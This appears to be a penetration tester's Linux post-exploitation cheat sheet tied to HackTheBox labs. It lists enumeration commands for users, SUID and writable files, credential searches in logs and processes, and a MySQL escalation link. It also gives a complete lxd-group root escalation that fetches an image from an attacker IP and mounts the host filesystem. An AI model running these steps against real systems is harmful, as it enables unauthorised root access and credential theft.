# Post Exploit Checks

## General Enumeration

* Know if the environment is a real host

```bash
ls -la / # check if the root dir has .[dot] files we can know if its a docker env 
hostname
```

* Know the permissions of the user

```bash
sudo -l
id
```

* Know the users&#x20;

```bash
cat /etc/passwd
```

* Check for `.htaccess` file
* `/etc/apache2/sites-enabled/*`
* `/etc/nginx/nginx.conf`
* `/etc/ssh/sshd_config`
* Application Specific Configs : wp-config, settings.php etc..,

## Groups Exploitation

### 4(adm)

* The adm group members can view the log files

```bash
cd /var/log
grep -EnRi password .
```

**Machine:**&#x20;

* Academy - HTB : <https://www.youtube.com/watch?v=yQl5RA6APyQ&t=2620>
* Doctor - HTB : <https://youtube.com/watch?v=JcOR9krOPFY&t=1780>

### 116(lxd)

* The lxd users can create a malicious docker like contents to load the /root of the machine in a containerized environment

```bash
# attacker machine
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

# victim machine
lxd init # yes to all 
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container
cd /mnt/root # provides the root of the victim machine
```

## Files Enumeration

* Find suid binaries

```bash
find / -perm /4000 -ls 2>/dev/null
```

* Find Writeable files

```bash
find / -type f -writable 2>/dev/null | grep -v proc
```

* Find files owned by the user (group specific)

```bash
# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null
```

* Locations to check

```bash
ls /opt
ls /usr/local/bin
ls ~/.local/bin
```

## Background Jobs Enumeration

* Crontabs

```bash
crontab -l
cat /etc/crontab
```

* Enumerate processes with [pspy](https://github.com/DominicBreuker/pspy)

## Network Enumeration

* Know the network adapters ( might be communicating internally )

```bash
ip a
```

* Open Ports and services

```bash
netstat -antp
# look for unusal services running interally or mysql service 
```

## Process Enumeration

* Enumerate the services that are running&#x20;

```bash
ps aux
```

* Get more information about the process (like the passed arguments etc.., it might contain passwords )

```bash
# know the process id from ps aux
cat /proc/<processid>/cmd
```

## Web Directories

* Check the web directories for passwords

```bash
/var/www/*
```

## MYSQL&#x20;

* If MYSQL is running as **root** in the machine check for priv esc via library&#x20;
* <https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql#privilege-escalation-via-library>
* <https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py>
* The `\G` option in the sql query of the mysql prints the information in a prettier format

```bash
# Connecting to mysql
mysql -u root -p 
# password prompt

mysql> select * from wp_users \G # instead of "select * from wp_users;"
```